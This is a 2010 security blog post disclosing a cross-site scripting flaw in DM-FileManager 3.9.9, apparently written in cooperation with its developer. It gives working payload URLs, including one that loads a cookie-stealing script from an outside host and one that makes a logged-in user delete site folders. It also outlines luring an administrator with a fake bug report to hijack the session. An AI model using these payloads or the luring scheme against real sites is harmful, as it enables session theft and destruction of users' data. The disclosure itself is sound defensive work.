nDarkness Logo
  • Home
  • Forums
30 Jan 2010

DM-FileManager 3.9.9 XSS Vulnerability



The nDarkness community has recently been working with the wonderful developers over at DutchMonkey.com to review and point out security flaws in some of their freely available software.

During this review process, there were several issues found and we will be posting them in the coming weeks for educational purposes. It is our hope that this information will be used to help others write more secure code and realize the dangers involved with these mistakes.

DM-FileManager 3.9.9 and below is vulnerable to XSS via the message variable not being properly sanitized.

This example shows nDarkness.com in an iframe within the login page:

http://localhost/~safety/dm-filemanager/login.php?referrer=/&message=<p align=center><iframe src=http://ndarkness.com width=100% height=800></iframe></p>

Here is a url encoded version:


http://localhost/~safety/dm-filemanager/login.php?referrer=/&message=%3C%70%20%61%6C%69%67%6E%3D%63%65%6E%74%65%72%3E%3C%69%66%72%61%6D%65%20%73%72%63%3D%68%74%74%70%3A%2F%2F%6E%64%61%72%6B%6E%65%73%73%2E%63%6F%6D%20%77%69%64%74%68%3D%31%30%30%25%20%68%65%69%67%68%74%3D%38%30%30%3E%3C%2F%69%66%72%61%6D%65%3E%3C%2F%70%3E

and one step farther is the cookie stealer script:

http://localhost/~safety/dm-filemanager/login.php?referrer=/&message=<SCRIPT SRC=http://blog.ndarkness.com/get-cookie.js></SCRIPT>

Here is a url encoded version:


http://localhost/~safety/dm-filemanager/login.php?message=%3C%53%43%52%49%50%54%20%53%52%43%3D%68%74%74%70%3A%2F%2F%62%6C%6F%67%2E%6E%64%61%72%6B%6E%65%73%73%2E%63%6F%6D%2F%67%65%74%2D%63%6F%6F%6B%69%65%2E%6A%73%3E%3C%2F%53%43%52%49%50%54%3E

A common exploit for this would be to make up a bug report and alert the site owner of the situation in the hopes that they were logged in when they clicked the link above. The next step would be to use session hijacking to steal the user’s session.

Another option is to call the delete folder ajax.php command and let the user delete directories off of their site.


http://localhost/~safety/dm-filemanager/login.php?referrer=/&message=http://localhost/~safety/dm-filemanager/ajax.php?currdir=/safety/Sites/wp/&rmdir=yes&folder=/safety/Sites/wp/wp-admin&dir=wp-admin

DM-Filemanager users should not follow untrusted links and should upgrade to the latest version.

GHTime Code(s): 262b5 e4f3d f515c nc 
  •  
  •  
  •  
  •  
  •  
  •  
  •  
  •  
  •  
  •  
  •  
  •  
  •  
  •  

Tags: DM-FileManager, Exploit, Hacking, Software, Vulnerability, XSS

This entry was posted on Saturday, January 30th, 2010 at 10:03 pm and is filed under Computer Security. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.

Leave a Reply

Click here to cancel reply.

CAPTCHA Image CAPTCHA Audio
Refresh Image
« DM-FileManager 3.9.6 Cookie Injection and Authorization Bypass Vulnerability
Intuit QuickBooks Discount Error Goes Unfixed »

  • nDarkness Recent Posts

    • Mac OS X – Update PHP, MySQL and Easily Add GD Support
    • Facebook’s Privacy Troubles on the Horizon
    • Should MySpace Be Put Out to Pasture?
    • WordPress Sites Hacked in Bulk
    • Intuit QuickBooks Discount Error Goes Unfixed
    • DM-FileManager 3.9.9 XSS Vulnerability
    • DM-FileManager 3.9.6 Cookie Injection and Authorization Bypass Vulnerability
    • Windows XP Roaming Profile Synchronization Issues
    • Windows XP – Reclaim Lost Hard Drive Space
    • Linux System Update Script

  • Sponsors


  • Recent Comments

    • Jacob on Facebook’s Privacy Troubles on the Horizon
    • Sid on Intuit QuickBooks Discount Error Goes Unfixed
    • safety on Intuit QuickBooks Discount Error Goes Unfixed
    • sid on Intuit QuickBooks Discount Error Goes Unfixed
    • safety on Intuit QuickBooks Discount Error Goes Unfixed
    • rafalbo on Intuit QuickBooks Discount Error Goes Unfixed
    • safety on Should MySpace Be Put Out to Pasture?
    • wclax04 on Should MySpace Be Put Out to Pasture?
    • safety on Intuit QuickBooks Discount Error Goes Unfixed
    • kgermino on Intuit QuickBooks Discount Error Goes Unfixed

  • User Recent Posts

    • Mandi has posted - Teaching My Baby Sign Language
    • Mandi has posted - Weekend Fun and CJ's Birthday
    • Mandi has posted - The Do's and Don'ts of Tipping
    • Mandi has posted - First Words
    • Cassey has posted - My New Toy

  • Categories

    • Account information (1)
    • Computer Security (6)
    • Linux (3)
    • Mac OS X (5)
    • Privacy (6)
    • Social Networking (2)
    • Software (4)
    • Uncategorized (1)
    • Utilities (4)
    • Windows (6)

  • Archives

    • May 2010 (5)
    • January 2010 (1)
    • December 2009 (1)
    • November 2009 (4)
    • October 2009 (6)

  • Site Links

    • Log in
    • Entries RSS
    • Comments RSS
    • WordPress.org

  • Tags

    Cookie Injection DM-Albums DM-FileManager Error Exchange Exploit Facebook Flash Flash Cookies Hacking Intuit Linux Mac MacBook MacBook Pro MySpace MySQL OS X PHP Privacy QuickBooks Service Slackware Social Networking Software Sprint Ubuntu Vulnerability Windows WordPress XP XSS
nDarkness is proudly powered by WordPress
Entries (RSS) and Comments (RSS).
Privacy Policy